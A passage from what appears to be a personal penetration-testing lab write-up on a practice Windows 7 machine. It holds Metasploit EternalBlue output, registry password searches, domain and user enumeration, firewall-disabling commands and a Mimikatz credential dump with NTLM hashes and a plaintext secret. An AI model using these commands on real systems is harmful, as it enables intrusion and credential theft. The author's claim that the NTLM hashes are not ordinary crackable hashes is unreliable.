[*] 10.129.123.117:445 - Sending final SMBv2 buffers.
[*] 10.129.123.117:445 - Sending last fragment of exploit packet!
[*] 10.129.123.117:445 - Receiving response from exploit packet
[+] 10.129.123.117:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.123.117:445 - Sending egg to corrupted connection.
[*] 10.129.123.117:445 - Triggering free of corrupted buffer.
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.129.123.117:445 - Connecting to target for exploitation.
[+] 10.129.123.117:445 - Connection established for exploitation.
[+] 10.129.123.117:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.123.117:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.123.117:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.123.117:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.123.117:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.129.123.117:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.123.117:445 - Trying exploit with 22 Groom Allocations.
[*] 10.129.123.117:445 - Sending all but last fragment of exploit packet
[*] 10.129.123.117:445 - Starting non-paged pool grooming
[+] 10.129.123.117:445 - Sending SMBv2 buffers
[+] 10.129.123.117:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.123.117:445 - Sending final SMBv2 buffers.
[*] 10.129.123.117:445 - Sending last fragment of exploit packet!
[*] 10.129.123.117:445 - Receiving response from exploit packet
[+] 10.129.123.117:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.123.117:445 - Sending egg to corrupted connection.
[*] 10.129.123.117:445 - Triggering free of corrupted buffer.
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.

[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Now back to Enumeration, which make no sense, but:

wmic nicconfig get description,IPAddress,MACaddress

netsh advfirewall firewall show rule name=all

reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
    (Default)    REG_SZ    HomeGroup Password

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
    (Default)    REG_SZ    LogonPasswordReset

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
    (Default)    REG_SZ    changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IAS.ChangePassword\CurVer
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
    (Default)    REG_SZ    IHomeGroupPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
    (Default)    REG_SZ    _PasswordDeriveBytes

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
    (Default)    REG_SZ    ISupportPasswordMode

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
    (Default)    REG_SZ    HomeGroup Password

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
    (Default)    REG_SZ    LogonPasswordReset

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
    (Default)    REG_SZ    changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
    (Default)    REG_SZ    IHomeGroupPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
    (Default)    REG_SZ    _PasswordDeriveBytes

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
    (Default)    REG_SZ    ISupportPasswordMode

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
    Text    REG_SZ    Automatic logon with current user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{63d2bb1d-e39a-41b8-9a3d-52dd06677588}\ChannelReferences\5
    (Default)    REG_SZ    Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password - PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
    Text    REG_SZ    Automatic logon with current user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password - PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
    (Default)    REG_SZ    HomeGroup Password

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
    (Default)    REG_SZ    LogonPasswordReset

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
    (Default)    REG_SZ    changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
    (Default)    REG_SZ    IHomeGroupPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
    (Default)    REG_SZ    _PasswordDeriveBytes

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
    (Default)    REG_SZ    ISupportPasswordMode

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

End of search: 103 match(es) found.

reg query HKCU /f password /t REG_SZ /s

HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\A\52C64B7E
    @%systemroot%\system32\psbase.dll,-301    REG_SZ    Provides protected storage for sensitive data, such as passwords, to prevent access by unauthorized services, processes, or users.

End of search: 2 match(es) found.

wmic bios

wmic baseboard get manufacturer

wmic cpu list full

wmic qfe

wmic product get name, version, vendor

wmic qfe get Caption, Description, HotFixID, InstalledOn

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Schtasks /query /fo LIST /v

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Stage 4: Post-exploitation

The post-exploitation phase is about diving deeper. An attacker will attempt to gather more information, elevate access (or privileges), and ensure they have a way to get back in if they lose access (this is called persistence). We’ll also revisit the information-gathering tasks performed earlier since we now have internal access.

We have highest privilege achieved with this exploit.

GitHub - emilyanncr/Windows-Post-Exploitation: Windows post-exploitation tools, resources, techniques and commands to use during post-exploitation phase of penetration test. Contributions are appreciated. Enjoy!GitHub

Let's try to get offensive 👿

Disable Firewall

netsh.exe firewall set opmode mode=disable profile=all

C:\Users\Administrator\Desktop>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.

Check users and domain

net user  (for local user)
net user  /domain (for a domain user)
net group "Domain Admins" /domain

net accounts
net accounts /domain
net logalgroup administrators
net localgroup administrators /dmain
net group "domain Admins" /domain
net group "Enterprise Admins" /domain
net view /localgroup
net localgroup Administrators
net localgroup /Domain
gpresult: view group policy
gupdate: update group policy
gpresult /z

Metasploit Unleashed | Mimikatzwww.offsec.com

Domain : HARIS-PC
SysKey : a749692f1dc76b46d7141ef778aa6bef
Local SID : S-1-5-21-319597671-3711062392-2889596693

SAMKey : a226d4d47dab3eb7a306c8b85ec359cb

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: cdf51b162460b7d5bc898f493751a0cc

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : haris
  Hash NTLM: 8002bc89de91f6b52d518bde69202dc6

RID  : 000003e9 (1001)
User : purplebyteone
  Hash NTLM: 744356dd2aeacf1d096d83eba7dbdd54

Domain : HARIS-PC
SysKey : a749692f1dc76b46d7141ef778aa6bef

Local name : haris-PC ( S-1-5-21-319597671-3711062392-2889596693 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {060be82b-0750-887a-808d-0774087457db}
  [00] {060be82b-0750-887a-808d-0774087457db} d28ec83ef05184b93100beaa4d64a6a1a420b8a7a144c943fe57f60fbaa6425d

Secret  : DefaultPassword
old/text: kERjCoEmxdlSD

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 0a f3 a4 c2 1c ac 07 2f 83 07 61 b5 02 67 89 78 95 2d f3 0d 0f c8 4e 4e a5 c8 92 f6 74 a6 ea b6 fb 62 3e a7 93 cf cf 6f 
    full: 0af3a4c21cac072f830761b502678978952df30d0fc84e4ea5c892f674a6eab6fb623ea793cfcf6f
    m/u : 0af3a4c21cac072f830761b502678978952df30d / 0fc84e4ea5c892f674a6eab6fb623ea793cfcf6f
old/hex : 01 00 00 00 c9 22 d6 0b 83 9e dd 98 a7 ad 7a 5a c5 ff 4e bb 8a d2 6f 01 61 be bf d4 bc 70 54 70 fd df 46 12 a8 c5 e5 2d 98 6c 79 71 
    full: c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f0161bebfd4bc705470fddf4612a8c5e52d986c7971
    m/u : c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f01 / 61bebfd4bc705470fddf4612a8c5e52d986c7971

Connection died. I feel tired now to get it back have no session. But we have 3 hashes.

Still complaining, I know how to fix it but want to moveon, session is killed so I won't pull it.

These hashes mostlikely are for different attack vector because normal hashes usually looks like:

3d83c8e717ff0e7ecfe187f088d69954:343141
$1$38652870$DUjsu4TTlTsOe/xxZ05uf/
$BLAKE2$296c269e70ac5f0095e6fb47693480f0f7b97ccd0307f5c3bfa4df8f5ca5c9308a0e7108e80a0a9c0ebb715e8b7109b072046c6cd5e155b4cfd2f27216283b1e

And etc. with these one's John and Hashcat can deal.

Stage 5: Lateral movement

Signaling the end of the engagement, lateral movement focuses on moving closer to valuable assets. The goal is to “follow the trail” and extend access to other hosts and applications. Now that we have a solid access point (or foothold) within the customer’s network, it's time spread out and survey the environment to pursue highly-protected, precious intellectual property (IP), sensitive resources, or access to a host.

In this case we have only 1 machine at the network and there is no valuable data to exfiltrate.

Stage 6: POC

The proof of concept phase is where specific vulnerabilities and security flaws are noted for reporting purposes. We are crafting the narrative that explains to customers how we gained access to their systems and how highlighted issues affect their security posture. This phase is key to tying everything together and ensures that the customer receives useful insights.

How exploit works?

Still much to learn.

Last updated 2 years ago